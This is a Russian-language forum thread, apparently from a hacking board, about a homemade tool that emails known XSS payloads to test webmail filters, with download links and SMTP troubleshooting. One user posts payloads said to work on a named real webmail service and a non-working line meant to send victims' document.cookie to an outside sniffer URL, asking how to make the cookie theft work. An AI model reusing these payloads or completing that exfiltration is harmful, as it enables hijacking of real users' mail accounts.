Зацени плиз мой XSS Tester:
http://sec-123.narod.ru/xss/XSSTest1_0.rar

Тестирует тело письма на известные ХСС.

Прикольно ничего не скажешь... Можно и у нас выложить если ты не против...

Проблема в том, что это будет работать только в том, случае, когда система пропускает теги, а этого практически никогда не бывает
Это все нужно оформлять не через Html теги а через Bb теги например (для форумов)

Да и еще OnERor пишется с двумя R

Ну это пока тестовая версия, и она только для email-ов.
А за OnERor псб - торопился :)
На счёт выложить - попозже наверно, счас программа сыровата.

интересная идея :)
сделаю себе такой...

Изменил немного:
http://xsstest.narod.ru/XSSTest1_0.rar

Я пишу такой же, но для форумов с работай чарес прокси серверы и т.д, но не хватает информации - одному сложно искать, если у кого есть подборочки с багами и подробным описанием, скинь те плиз на dead-3000@tut.by - буду очень признателен.

Чё т мне кажется, что нужны не готовые "подборочки", как для емаилов, а чтото более навороченное.
P.s.: хотя я могу ошибаться ;)

Не понял тебя?

Чё т мне кажется, что нужны не готовые "подборочки", как для емаилов, а чтото более навороченное.
P.s.: хотя я могу ошибаться ;)
Да, нужно что бы система тестировала прохождение кавычек, тегов, ключевых слов типа javascript в разных случаях, в разных тегах и т.д.

Да я кстати думаю что лучше такую систему вообще полностью онлайн сделать

в образовательных целях так сказать,чтоб такие юзвери как я могли трениться.
ток я пока в это тесте ниче не понимаю.ключевое слово "пока".

где сейчас можно скачать XSSTest так как приведенные выше ссылки уже не работают??

Смотри Faq к разделу.

Сылки работают. Зделай проще скопируй сылку и вствь в адресную строку своего браузера.

Прога супер!!! огромное спасибо!
вот только помагите правильно составить запрос... у меня что то нифига не получается :(
вобщем вот эта xss
<body onLoad=alert(2)>
и вот эта
<meta http-equiv=Refresh content=0;url=javascript:alert(4)>
работают на mail.gala.net
но никак не могу добится что бы мне пришли куки :( я делал вот так:
<body onLoad="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie>
вобщем объясните как эту xss юзать?

Так так, а как им пользоваться? :)

всё очень просто:) отправляеш письмо на свой ящик который хочеш проверить... и смотриш результаты:)

Приветсвтую!
Вот решил испробовать XSS тестер.
При завершении пишет постоянно:

Error in command: must be 250, but returned -->>
recived:
˜øš
sended:
QUIT

Error in command: must be 221, but returned -->>
recived:
˜øš
Socket closed
-------ERROR------
SMTP`session ENDed with ERROR : message not sended!!!
-----END_ERROR-----

Вот значит, вроде бы правильно все ввожу:
в строке
от: 66-66-66@mail.ru
кому: mpetrovsky@mail.ru
сервер: smtp.mail.ru
порт: 25
авторизация: USER: 66-66-66 PASSWORD: *********

запускаю, результат выше был описан.
что не так?